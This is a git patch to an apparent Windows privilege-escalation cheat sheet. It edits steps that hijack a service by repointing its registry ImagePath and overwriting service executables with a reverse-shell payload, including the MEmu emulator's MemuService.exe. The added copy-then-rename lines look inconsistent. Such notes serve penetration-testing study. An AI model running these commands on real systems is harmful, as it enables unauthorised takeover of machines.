From bca1e092d744a039215a773c259688bd755f68d8 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Mon, 17 Oct 2022 08:26:08 -0400
Subject: [PATCH] Update README.md

---
 README.md | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 8d1c7bf..5b04807 100644
--- a/README.md
+++ b/README.md
@@ -1237,7 +1237,7 @@ Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
 reg query HKLM:\System\CurrentControlSet\Services\regsvc
 # Overwrite the imagePath registry key to point to reverse shell
-reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\{PAYLOAD PATH ex. C:\PrivEsc\reverse.exe} /f
+reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\Public\Downloads\run.exe /f
 # Start the service:
 net start regsvc
@@ -1258,9 +1258,13 @@ net start regsvc
 # Copy the reverse shell executable to overwrite the service executable
 copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
+Copy-Item "C:\Users\Public\Downloads\run.exe" "C:\Program Files\Microvirt\MEmu\MemuService.exe"
+Rename-Item "C:\Program Files\Microvirt\MEmu\MemuService.exe" "C:\Program Files\Microvirt\MEmu\MemuService.bak"
+
 # Start the service
 net start filepermsvc
+Restart-Computer
 #########################################################################
 #### 5. DLL Hijacking ###################################################